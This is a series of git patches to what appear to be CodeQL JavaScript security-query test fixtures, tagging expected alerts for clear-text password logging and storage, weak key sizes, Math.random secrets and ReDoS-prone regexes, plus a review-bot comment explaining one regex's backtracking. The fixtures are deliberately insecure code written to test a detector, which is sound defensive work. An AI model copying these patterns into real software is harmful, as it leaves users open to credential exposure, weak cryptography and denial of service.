@@ -1,2 +1,2 @@ var server = require("./server"); -console.log(password); +console.log(password); // $ Alert[js/clear-text-logging] diff --git a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_4.js b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_4.js index 53279ea2853a..c47deadde58a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_4.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_4.js @@ -1,2 +1,2 @@ require("foo"); -console.log(password); +console.log(password); // $ Alert[js/clear-text-logging] diff --git a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_5.js b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_5.js index 6070f3d1aebb..d5bb42d5dd07 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_5.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_5.js @@ -5,5 +5,5 @@ app.get('/some/path', function() { }) function f(x) { - console.log(x); + console.log(x); // $ Alert[js/clear-text-logging] } diff --git a/javascript/ql/test/query-tests/Security/CWE-312/tst-webstorage.js b/javascript/ql/test/query-tests/Security/CWE-312/tst-webstorage.js index d6adb2fbb75b..43c9e0423e36 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/tst-webstorage.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/tst-webstorage.js @@ -1,4 +1,4 @@ -localStorage.x = data.password; -localStorage.setItem('x', data.password) -sessionStorage.x = data.password; -sessionStorage.setItem('x', data.password) +localStorage.x = data.password; // $ Alert[js/clear-text-storage-of-sensitive-data] +localStorage.setItem('x', data.password) // $ Alert[js/clear-text-storage-of-sensitive-data] +sessionStorage.x = data.password; // $ Alert[js/clear-text-storage-of-sensitive-data] +sessionStorage.setItem('x', data.password) // $ Alert[js/clear-text-storage-of-sensitive-data] 
From 0f8e85fa2fa1a961c8b15f8dcb4c8f43babd4b81 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:36:10 +0100 Subject: [PATCH 037/115] JS: Accept alerts for InsufficientKeySize --- javascript/ql/test/query-tests/Security/CWE-326/tst.js | 2 +- javascript/ql/test/query-tests/Security/CWE-326/tst.xsjs | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-326/tst.js b/javascript/ql/test/query-tests/Security/CWE-326/tst.js index 3f636a97e966..839d4fcfc816 100644 --- a/javascript/ql/test/query-tests/Security/CWE-326/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-326/tst.js @@ -32,7 +32,7 @@ var bad9 = forge.cipher.createDecipher('3DES-CBC', key3); // $ Alert var key4 = myBuffer.getBytes(16); var good5 = forge.cipher.createDecipher('AES-CBC', key4); -var bad10 = crypto.createDiffieHellman(512); +var bad10 = crypto.createDiffieHellman(512); // $ Alert var good6 = crypto.createDiffieHellman(2048); const NodeRSA = require('node-rsa'); diff --git a/javascript/ql/test/query-tests/Security/CWE-326/tst.xsjs b/javascript/ql/test/query-tests/Security/CWE-326/tst.xsjs index d5e5051af668..1db03f450491 100644 --- a/javascript/ql/test/query-tests/Security/CWE-326/tst.xsjs +++ b/javascript/ql/test/query-tests/Security/CWE-326/tst.xsjs @@ -1,5 +1,5 @@ const crypto = $.require("crypto"); -const bad1 = crypto.generateKeyPairSync("rsa", { modulusLength: 1024 }); // NOT OK +const bad1 = crypto.generateKeyPairSync("rsa", { modulusLength: 1024 }); // $ Alert const good1 = crypto.generateKeyPairSync("rsa", { modulusLength: 4096 }); // OK From 92c39394576da5a363f9256e6020e181566a6284 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 18 Feb 2025 13:19:37 +0100 Subject: [PATCH 038/115] JS: Accept InsecureRandomness alerts --- javascript/ql/test/query-tests/Security/CWE-338/tst.js | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) 
diff --git a/javascript/ql/test/query-tests/Security/CWE-338/tst.js b/javascript/ql/test/query-tests/Security/CWE-338/tst.js index d8d0c1adcb74..d22bcc5d6df2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-338/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-338/tst.js @@ -87,12 +87,12 @@ function f17() { } function f18() { - var secret = (o.password = Math.random()); + var secret = (o.password = Math.random()); // $ Alert } (function(){ var crypto = require('crypto'); - crypto.createHmac('sha256', Math.random()); + crypto.createHmac('sha256', Math.random()); // $ Alert })(); (function () { @@ -118,7 +118,7 @@ function uid() { var my_nice_uid = Math.floor(Math.random() * 4_000_000_000); // $ Alert var liquid = Math.random(); var UUID = Math.random(); // $ Alert - var MY_UID = Math.random(); // NOK OK + var MY_UID = Math.random(); // $ Alert } function buildPass(opts, length) { @@ -136,4 +136,4 @@ function buildPass(opts, length) { password += chars[Math.floor(Math.random() * chars.length)]; // $ Alert } return password; -} \ No newline at end of file +} From 283b14207dfb82901dcb198505411d07f0461bf3 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 09:18:56 +0100 Subject: [PATCH 039/115] JS: Accept some ReDoS alerts --- .../Security/CWE-400/ReDoS/highlight.js | 20 +++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/highlight.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/highlight.js index f12d49ba07ae..7677dad3f53d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/highlight.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/highlight.js 
@@ -1,39 +1,39 @@ // routeros -var bad = /(\.\.\/|\/|\s)((traffic-flow|traffic-generator|firewall|scheduler|aaa|accounting|address-list|address|align|area|bandwidth-server|bfd|bgp|bridge|client|clock|community|config|connection|console|customer|default|dhcp-client|dhcp-server|discovery|dns|e-mail|ethernet|filter|firewall|firmware|gps|graphing|group|hardware|health|hotspot|identity|igmp-proxy|incoming|instance|interface|ip|ipsec|ipv6|irq|l2tp-server|lcd|ldp|logging|mac-server|mac-winbox|mangle|manual|mirror|mme|mpls|nat|nd|neighbor|network|note|ntp|ospf|ospf-v3|ovpn-server|page|peer|pim|ping|policy|pool|port|ppp|pppoe-client|pptp-server|prefix|profile|proposal|proxy|queue|radius|resource|rip|ripng|route|routing|screen|script|security-profiles|server|service|service-port|settings|shares|smb|sms|sniffer|snmp|snooper|socks|sstp-server|system|tool|tracking|type|upgrade|upnp|user-manager|users|user|vlan|secret|vrrp|watchdog|web-access|wireless|pptp|pppoe|lan|wan|layer7-protocol|lease|simple|raw);?\s)+X/; +var bad = /(\.\.\/|\/|\s)((traffic-flow|traffic-generator|firewall|scheduler|aaa|accounting|address-list|address|align|area|bandwidth-server|bfd|bgp|bridge|client|clock|community|config|connection|console|customer|default|dhcp-client|dhcp-server|discovery|dns|e-mail|ethernet|filter|firewall|firmware|gps|graphing|group|hardware|health|hotspot|identity|igmp-proxy|incoming|instance|interface|ip|ipsec|ipv6|irq|l2tp-server|lcd|ldp|logging|mac-server|mac-winbox|mangle|manual|mirror|mme|mpls|nat|nd|neighbor|network|note|ntp|ospf|ospf-v3|ovpn-server|page|peer|pim|ping|policy|pool|port|ppp|pppoe-client|pptp-server|prefix|profile|proposal|proxy|queue|radius|resource|rip|ripng|route|routing|screen|script|security-profiles|server|service|service-port|settings|shares|smb|sms|sniffer|snmp|snooper|socks|sstp-server|system|tool|tracking|type|upgrade|upnp|user-manager|users|user|vlan|secret|vrrp|watchdog|web-access|wireless|pptp|pppoe|lan|wan|layer7-protocol|lease|simple|raw);?\s)+X/; 
// $ Alert[js/redos] var good = /(\.\.\/|\/|\s)((traffic-flow|traffic-generator|firewall|scheduler|aaa|accounting|address-list|address|align|area|bandwidth-server|bfd|bgp|bridge|client|clock|community|config|connection|console|customer|default|dhcp-client|dhcp-server|discovery|dns|e-mail|ethernet|filter|firmware|gps|graphing|group|hardware|health|hotspot|identity|igmp-proxy|incoming|instance|interface|ip|ipsec|ipv6|irq|l2tp-server|lcd|ldp|logging|mac-server|mac-winbox|mangle|manual|mirror|mme|mpls|nat|nd|neighbor|network|note|ntp|ospf|ospf-v3|ovpn-server|page|peer|pim|ping|policy|pool|port|ppp|pppoe-client|pptp-server|prefix|profile|proposal|proxy|queue|radius|resource|rip|ripng|route|routing|screen|script|security-profiles|server|service|service-port|settings|shares|smb|sms|sniffer|snmp|snooper|socks|sstp-server|system|tool|tracking|type|upgrade|upnp|user-manager|users|user|vlan|secret|vrrp|watchdog|web-access|wireless|pptp|pppoe|lan|wan|layer7-protocol|lease|simple|raw);?\s)+X/; // powershell -var bad = /(Add|Clear|Close|Copy|Enter|Exit|Find|Format|Get|Hide|Join|Lock|Move|New|Open|Optimize|Pop|Push|Redo|Remove|Rename|Reset|Resize|Search|Select|Set|Show|Skip|Split|Step|Switch|Undo|Unlock|Watch|Backup|Checkpoint|Compare|Compress|Convert|ConvertFrom|ConvertTo|Dismount|Edit|Expand|Export|Group|Import|Initialize|Limit|Merge|New|Out|Publish|Restore|Save|Sync|Unpublish|Update|Approve|Assert|Complete|Confirm|Deny|Disable|Enable|Install|Invoke|Register|Request|Restart|Resume|Start|Stop|Submit|Suspend|Uninstall|Unregister|Wait|Debug|Measure|Ping|Repair|Resolve|Test|Trace|Connect|Disconnect|Read|Receive|Send|Write|Block|Grant|Protect|Revoke|Unblock|Unprotect|Use|ForEach|Sort|Tee|Where)+(-)[\w\d]+/; +var bad = 
/(Add|Clear|Close|Copy|Enter|Exit|Find|Format|Get|Hide|Join|Lock|Move|New|Open|Optimize|Pop|Push|Redo|Remove|Rename|Reset|Resize|Search|Select|Set|Show|Skip|Split|Step|Switch|Undo|Unlock|Watch|Backup|Checkpoint|Compare|Compress|Convert|ConvertFrom|ConvertTo|Dismount|Edit|Expand|Export|Group|Import|Initialize|Limit|Merge|New|Out|Publish|Restore|Save|Sync|Unpublish|Update|Approve|Assert|Complete|Confirm|Deny|Disable|Enable|Install|Invoke|Register|Request|Restart|Resume|Start|Stop|Submit|Suspend|Uninstall|Unregister|Wait|Debug|Measure|Ping|Repair|Resolve|Test|Trace|Connect|Disconnect|Read|Receive|Send|Write|Block|Grant|Protect|Revoke|Unblock|Unprotect|Use|ForEach|Sort|Tee|Where)+(-)[\w\d]+/; // $ Alert[js/redos] var good = /(Add|Clear|Close|Copy|Enter|Exit|Find|Format|Get|Hide|Join|Lock|Move|New|Open|Optimize|Pop|Push|Redo|Remove|Rename|Reset|Resize|Search|Select|Set|Show|Skip|Split|Step|Switch|Undo|Unlock|Watch|Backup|Checkpoint|Compare|Compress|Convert|ConvertFrom|ConvertTo|Dismount|Edit|Expand|Export|Group|Import|Initialize|Limit|Merge|Out|Publish|Restore|Save|Sync|Unpublish|Update|Approve|Assert|Complete|Confirm|Deny|Disable|Enable|Install|Invoke|Register|Request|Restart|Resume|Start|Stop|Submit|Suspend|Uninstall|Unregister|Wait|Debug|Measure|Ping|Repair|Resolve|Test|Trace|Connect|Disconnect|Read|Receive|Send|Write|Block|Grant|Protect|Revoke|Unblock|Unprotect|Use|ForEach|Sort|Tee|Where)+(-)[\w\d]+/; // perl -var bad = /(s|tr|y)\/(\\.|[^/])*\/(\\.|[^/])*\/[a-z]*/m; +var bad = /(s|tr|y)\/(\\.|[^/])*\/(\\.|[^/])*\/[a-z]*/m; // $ Alert[js/redos] var good = /(s|tr|y)\/(\\.|[^\\\/])*\/(\\.|[^\\\/])*\/[dualxmsipn]{0,12}/m; // gams -var bad = /([ ]*[a-z0-9&#*=?@\\><:,()$[\]_.{}!+%^-]+)+X/; +var bad = /([ ]*[a-z0-9&#*=?@\\><:,()$[\]_.{}!+%^-]+)+X/; // $ Alert[js/redos] var good = /[a-z0-9&#*=?@\\><:,()$[\]_.{}!+%^-]+([ ]+[a-z0-9&#*=?@\\><:,()$[\]_.{}!+%^-]+)*/im; // handlebars -var bad = /('.*?'|".*?"|\[.*?\]|[^\s!"#%&'()*+,.\/;<=>@\[\\\]^`{|}~]+|\.|\/)+X/; +var bad = 
/('.*?'|".*?"|\[.*?\]|[^\s!"#%&'()*+,.\/;<=>@\[\\\]^`{|}~]+|\.|\/)+X/; // $ Alert[js/redos] var good = /(\.|\.\/|\/)?(""|"[^"]+"|''|'[^']+'|\[\]|\[[^\]]+\]|[^\s!"#%&'()*+,.\/;<=>@\[\\\]^`{|}~]+)((\.|\/)(""|"[^"]+"|''|'[^']+'|\[\]|\[[^\]]+\]|[^\s!"#%&'()*+,.\/;<=>@\[\\\]^`{|}~]+))*/im; // c-like -var bad = /((decltype\(auto\)|(?:[a-zA-Z_]\w*::)?[a-zA-Z_]\w*(?:<.*?>)?)[\*&\s]+)+(?:[a-zA-Z_]\w*::)?[a-zA-Z]\w*\s*\(/m; +var bad = /((decltype\(auto\)|(?:[a-zA-Z_]\w*::)?[a-zA-Z_]\w*(?:<.*?>)?)[\*&\s]+)+(?:[a-zA-Z_]\w*::)?[a-zA-Z]\w*\s*\(/m; // $ Alert[js/redos] var good = /((decltype\(auto\)|([a-zA-Z_]\w*::)?[a-zA-Z_]\w*(<[^<>]+>)?)[\*&\s]+)+([a-zA-Z_]\w*::)?[a-zA-Z]\w*\s*\(/m; // jboss-cli -var bad = /\B(([\/.])[\w\-.\/=]+)+X/; +var bad = /\B(([\/.])[\w\-.\/=]+)+X/; // $ Alert[js/redos] var good = /\B([\/.])[\w\-.\/=]+X/; // r -var bad = /`(?:\\.|[^`])+`/m; +var bad = /`(?:\\.|[^`])+`/m; // $ Alert[js/redos] var good = /`(?:\\.|[^`\\])+`/; // erlang-repl -var bad = /\?(::)?([A-Z]\w*(::)?)+X/; +var bad = /\?(::)?([A-Z]\w*(::)?)+X/; // $ Alert[js/redos] var good = /\?(::)?([A-Z]\w*)((::)[A-Z]\w*)*X/; // javascript -var bad = /[a-zA-Z_]\w*\([^()]*(\([^()]*(\([^()]*\))*[^()]*\))*[^()]*\)\s*\{/m; +var bad = /[a-zA-Z_]\w*\([^()]*(\([^()]*(\([^()]*\))*[^()]*\))*[^()]*\)\s*\{/m; // $ Alert[js/redos] var good = /[a-zA-Z_]\w*\([^()]*(\([^()]*(\([^()]*\)[^()]*)*\)[^()]*)*\)\s*\{/m; From d298d8740f8fdc93b237843a4fd877cb7c191f37 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 09:29:38 +0100 Subject: [PATCH 040/115] JS: Accept some exponenital redos alerts in the polynomial redos test suite --- .../query-tests/Security/CWE-400/ReDoS/polynomial-redos.js | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/polynomial-redos.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/polynomial-redos.js index 30b64fd37a8c..95e58d2f060c 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/polynomial-redos.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/polynomial-redos.js @@ -14,7 +14,7 @@ app.use(function(req, res) { tainted.replace(/^.*\./, ''); tainted.replace(/^(`+)\s*([\s\S]*?[^`])\s*\1(?!`)/); // $ Alert[js/polynomial-redos] tainted.replace(/^(`+)([\s\S]*?[^`])\1(?!`)/); // $ Alert[js/polynomial-redos] - /^(.*,)+(.+)?$/.test(tainted); // $ Alert[js/polynomial-redos] + /^(.*,)+(.+)?$/.test(tainted); // $ Alert[js/polynomial-redos] Alert[js/redos] tainted.match(/[0-9]*['a-z\u00A0-\u05FF\u0700-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF]+|[\u0600-\u06FF\/]+(\s*?[\u0600-\u06FF]+){1,2}/i); // $ Alert[js/polynomial-redos] tainted.match(/[0-9]*['a-z\u00A0-\u05FF\u0700-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF]{1,256}|[\u0600-\u06FF\/]{1,256}(\s*?[\u0600-\u06FF]{1,256}){1,2}/i); // $ Alert[js/polynomial-redos] - even though it is a proposed fix for the above tainted.match(/^(\+|-)?(\d+|(\d*\.\d*))?(E|e)?([-+])?(\d+)?$/); // $ Alert[js/polynomial-redos] 
@@ -38,12 +38,12 @@ app.use(function(req, res) { tainted.match(/<.*href="([^"]+)".*>/); // $ Alert[js/polynomial-redos] tainted.match(/^([^-]+)-([A-Za-z0-9+/]+(?:=?=?))([?\x21-\x7E]*)$/); // $ Alert[js/polynomial-redos] - tainted.match(/^([^-]+)-([A-Za-z0-9+/=]{44,88})(\?[\x21-\x7E]*)*$/); // $ Alert - it is a fix for the above, but it introduces exponential complexity elsewhere + tainted.match(/^([^-]+)-([A-Za-z0-9+/=]{44,88})(\?[\x21-\x7E]*)*$/); // $ Alert[js/redos] - it is a fix for the above, but it introduces exponential complexity elsewhere tainted.match(/^([a-z0-9-]+)[ \t]+([a-zA-Z0-9+\/]+[=]*)([\n \t]+([^\n]+))?$/); // $ Alert[js/polynomial-redos] tainted.match(/^([a-z0-9-]+)[ \t]+([a-zA-Z0-9+\/]+[=]*)([ \t]+([^ \t][^\n]*[\n]*)?)?$/); - tainted.match(/^(?:\.?[a-zA-Z_][a-zA-Z_0-9]*)+$/); // $ Alert - also flagged by js/redos + tainted.match(/^(?:\.?[a-zA-Z_][a-zA-Z_0-9]*)+$/); // $ Alert[js/redos] - also flagged by js/redos tainted.match(/^(?:\.?[a-zA-Z_][a-zA-Z_0-9]*)(?:\.[a-zA-Z_][a-zA-Z_0-9]*)*$/); tainted.replaceAll(/\s*\n\s*/g, ' '); // $ Alert[js/polynomial-redos] From 51fb3dad74da0f851d2dd3c2034723bbb58cb23d Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 09:31:10 +0100 Subject: [PATCH 041/115] JS: Accept ReDoS alerts in regexplib --- .../CWE-400/ReDoS/regexplib/address.js | 4 ++-- .../Security/CWE-400/ReDoS/regexplib/dates.js | 2 +- .../Security/CWE-400/ReDoS/regexplib/email.js | 16 +++++++-------- .../CWE-400/ReDoS/regexplib/markup.js | 20 +++++++++---------- .../Security/CWE-400/ReDoS/regexplib/misc.js | 18 ++++++++--------- .../CWE-400/ReDoS/regexplib/strings.js | 12 +++++------ .../Security/CWE-400/ReDoS/regexplib/uri.js | 12 +++++------ 7 files changed, 42 insertions(+), 42 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/address.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/address.js index ba005a21fdef..d22023d27dd0 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/address.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/address.js 
@@ -48,7 +48,7 @@ /^(\d{2}-\d{2})*$/g; /^(\d{3}-\d{3}-\d{4})*$/g; /^\d{5}((\-|\s)?\d{4})?$/g; -/^\s*((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)\,?\s+((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)?\,?\s+((?:[A-Za-z]+\x20*)+)\,\s+(A[LKSZRAP]|C[AOT]|D[EC]|F[LM]|G[AU]|HI|I[ADLN]|K[SY]|LA|M[ADEHINOPST]|N[CDEHJMVY]|O[HKR]|P[ARW]|RI|S[CD]|T[NX]|UT|V[AIT]|W[AIVY])\s+(\d+(?:-\d+)?)\s*$/g; 
+/^\s*((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)\,?\s+((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)?\,?\s+((?:[A-Za-z]+\x20*)+)\,\s+(A[LKSZRAP]|C[AOT]|D[EC]|F[LM]|G[AU]|HI|I[ADLN]|K[SY]|LA|M[ADEHINOPST]|N[CDEHJMVY]|O[HKR]|P[ARW]|RI|S[CD]|T[NX]|UT|V[AIT]|W[AIVY])\s+(\d+(?:-\d+)?)\s*$/g; // $ Alert[js/redos] /[0-9]{4}\s*[a-zA-Z]{2}/g; /(^0.*[1-9]*)|(^860+)|(^8613)|(\D)|([0-9])/g; /(077|078|079)\s?\d{2}\s?\d{6}/g; 
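Review bot: The added `$ Alert[js/redos]` tag on a roughly 1 KB address regex gives a reader no way to check that the alert is genuine; the ambiguity is in `(?:C[\\\/]O\x20+(?:\w+\x20*)+)` and `((?:[A-Za-z]+\x20*)+)`, where the space separator can be empty so a run of word characters can be cut into iterations in exponentially many ways. Suggest recording that next to the tag, e.g. `// $ Alert[js/redos] - (?:\w+\x20*)+ and (?:[A-Za-z]+\x20*)+: separator optional`. The same literal is tagged again verbatim in the next hunk of this file, so whatever remark is written here should be copied there as well.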
@@ -72,7 +72,7 @@ /^(\d{2}-\d{2})*$/g; /^(?:\([2-9]\d{2}\)\ ?|(?:[2-9]\d{2}\-))[2-9]\d{2}\-\d{4}$/g; /^[1-9]{1}[0-9]{3}\s?[A-Z]{2}$/g; -/^\s*((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)\,?\s+((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)?\,?\s+((?:[A-Za-z]+\x20*)+)\,\s+(A[LKSZRAP]|C[AOT]|D[EC]|F[LM]|G[AU]|HI|I[ADLN]|K[SY]|LA|M[ADEHINOPST]|N[CDEHJMVY]|O[HKR]|P[ARW]|RI|S[CD]|T[NX]|UT|V[AIT]|W[AIVY])\s+(\d+(?:-\d+)?)\s*$/g; 
+/^\s*((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)\,?\s+((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)?\,?\s+((?:[A-Za-z]+\x20*)+)\,\s+(A[LKSZRAP]|C[AOT]|D[EC]|F[LM]|G[AU]|HI|I[ADLN]|K[SY]|LA|M[ADEHINOPST]|N[CDEHJMVY]|O[HKR]|P[ARW]|RI|S[CD]|T[NX]|UT|V[AIT]|W[AIVY])\s+(\d+(?:-\d+)?)\s*$/g; // $ Alert[js/redos] /[0-9]{4}\s*[a-zA-Z]{2}/g; /^(\d{3}-\d{3}-\d{4})*$/g; /^\d{5}((\-|\s)?\d{4})?$/g; diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/dates.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/dates.js index 39d1669109e4..14468a515657 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/dates.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/dates.js 
@@ -24,7 +24,7 @@ /((\d{2})|(\d))\/((\d{2})|(\d))\/((\d{4})|(\d{2}))/g; /^((0[1-9])|(1[0-2]))$/g; /^(\d{2}((0[1-9]|1[012])(0[1-9]|1\d|2[0-8])|(0[13456789]|1[012])(29|30)|(0[13578]|1[02])31)|([02468][048]|[13579][26])0229)$/g; -/^(?:\s*(Sun|Mon|Tue|Wed|Thu|Fri|Sat),\s*)?(0?[1-9]|[1-2][0-9]|3[01])\s+(Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec)\s+(19[0-9]{2}|[2-9][0-9]{3}|[0-9]{2})\s+(2[0-3]|[0-1][0-9]):([0-5][0-9])(?::(60|[0-5][0-9]))?\s+([-\+][0-9]{2}[0-5][0-9]|(?:UT|GMT|(?:E|C|M|P)(?:ST|DT)|[A-IK-Z]))(\s*\((\\\(|\\\)|(?<=[^\\])\((?)|(?<=[^\\])\)(?<-C>)|[^\(\)]*)*(?(C)(?!))\))*\s*$/g; +/^(?:\s*(Sun|Mon|Tue|Wed|Thu|Fri|Sat),\s*)?(0?[1-9]|[1-2][0-9]|3[01])\s+(Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec)\s+(19[0-9]{2}|[2-9][0-9]{3}|[0-9]{2})\s+(2[0-3]|[0-1][0-9]):([0-5][0-9])(?::(60|[0-5][0-9]))?\s+([-\+][0-9]{2}[0-5][0-9]|(?:UT|GMT|(?:E|C|M|P)(?:ST|DT)|[A-IK-Z]))(\s*\((\\\(|\\\)|(?<=[^\\])\((?)|(?<=[^\\])\)(?<-C>)|[^\(\)]*)*(?(C)(?!))\))*\s*$/g; // $ Alert[js/redos] /^((31(?! (FEB|APR|JUN|SEP|NOV)))|((30|29)(?! FEB))|(29(?= FEB (((1[6-9]|[2-9]\d)(0[48]|[2468][048]|[13579][26])|((16|[2468][048]|[3579][26])00)))))|(0?[1-9])|1\d|2[0-8])-(JAN|FEB|MAR|MAY|APR|JUL|JUN|AUG|OCT|SEP|NOV|DEC)-((1[6-9]|[2-9]\d)\d{2})$/g; 